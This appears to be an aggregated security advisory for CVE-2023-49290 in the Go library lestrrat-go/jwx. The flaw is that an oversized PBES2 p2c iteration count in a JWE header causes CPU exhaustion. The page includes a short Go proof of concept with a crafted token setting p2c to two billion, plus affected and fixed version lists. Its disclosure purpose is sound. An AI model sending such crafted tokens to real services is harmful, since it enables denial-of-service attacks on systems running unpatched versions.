Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS03Zjl4LWd3ODUtOGdyZs4AA3lA
lestrrat-go/jwx's malicious parameters in JWE can cause a DOS
Summary
too high p2c parameter in JWE's alg PBES2-* could lead to a DOS attack
Details
The JWE key management algorithms based on PBKDF2 require a JOSE Header Parameter called p2c (PBES2 Count). This parameter dictates the number of PBKDF2 iterations needed to derive a CEK wrapping key. Its primary purpose is to intentionally slow down the key derivation function, making password brute-force and dictionary attacks more resource- intensive.
Therefore, if an attacker sets the p2c parameter in JWE to a very large number, it can cause a lot of computational consumption, resulting in a DOS attack
PoC
package main
import (
"fmt"
"github.com/lestrrat-go/jwx/v2/jwa"
"github.com/lestrrat-go/jwx/v2/jwe"
"github.com/lestrrat-go/jwx/v2/jwk"
)
func main() {
token := []byte("eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMjU2R0NNIiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJNNzczSnlmV2xlX2FsSXNrc0NOTU9BIn0=.S8B1kXdIR7BM6i_TaGsgqEOxU-1Sgdakp4mHq7UVhn-_REzOiGz2gg.gU_LfzhBXtQdwYjh.9QUIS-RWkLc.m9TudmzUoCzDhHsGGfzmCA")
key, err := jwk.FromRaw([]byte(`abcdefg`))
payload, err := jwe.Decrypt(token, jwe.WithKey(jwa.PBES2_HS256_A128KW, key))
if err == nil {
fmt.Println(string(payload))
}
}
Impact
It's a kind of Dos attack, the user's environment could potentially utilize an excessive amount of CPU resources.
Permalink: https://github.com/advisories/GHSA-7f9x-gw85-8grfJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS03Zjl4LWd3ODUtOGdyZs4AA3lA
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: 12 months ago
Updated: 10 months ago
CVSS Score: 5.3
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L
Identifiers: GHSA-7f9x-gw85-8grf, CVE-2023-49290
References:
- https://github.com/lestrrat-go/jwx/security/advisories/GHSA-7f9x-gw85-8grf
- https://nvd.nist.gov/vuln/detail/CVE-2023-49290
- https://github.com/lestrrat-go/jwx/commit/64f2a229b8e18605f47361d292b526bdc4aee01c
- https://github.com/advisories/GHSA-7f9x-gw85-8grf
Blast Radius: 18.3
Affected Packages
go:github.com/lestrrat-go/jwx/v2
Dependent packages: 439Dependent repositories: 301
Downloads:
Affected Version Ranges: < 2.0.18
Fixed in: 2.0.18
All affected versions: 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, 2.0.6, 2.0.7, 2.0.8, 2.0.9, 2.0.10, 2.0.11, 2.0.12, 2.0.13, 2.0.14, 2.0.15, 2.0.16, 2.0.17
All unaffected versions: 2.0.18, 2.0.19, 2.0.20, 2.0.21, 2.1.0, 2.1.1, 2.1.2, 2.1.3
go:github.com/lestrrat-go/jwx
Dependent packages: 1,295Dependent repositories: 2,884
Downloads:
Affected Version Ranges: < 1.2.27
Fixed in: 1.2.27
All affected versions: 0.9.0, 0.9.1, 0.9.2, 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, 1.0.8, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.1.5, 1.1.6, 1.1.7, 1.2.0, 1.2.1, 1.2.2, 1.2.3, 1.2.4, 1.2.5, 1.2.6, 1.2.7, 1.2.8, 1.2.9, 1.2.10, 1.2.11, 1.2.12, 1.2.13, 1.2.14, 1.2.15, 1.2.16, 1.2.17, 1.2.18, 1.2.19, 1.2.20, 1.2.21, 1.2.22, 1.2.23, 1.2.24, 1.2.25, 1.2.26
All unaffected versions: 1.2.27, 1.2.28, 1.2.29, 1.2.30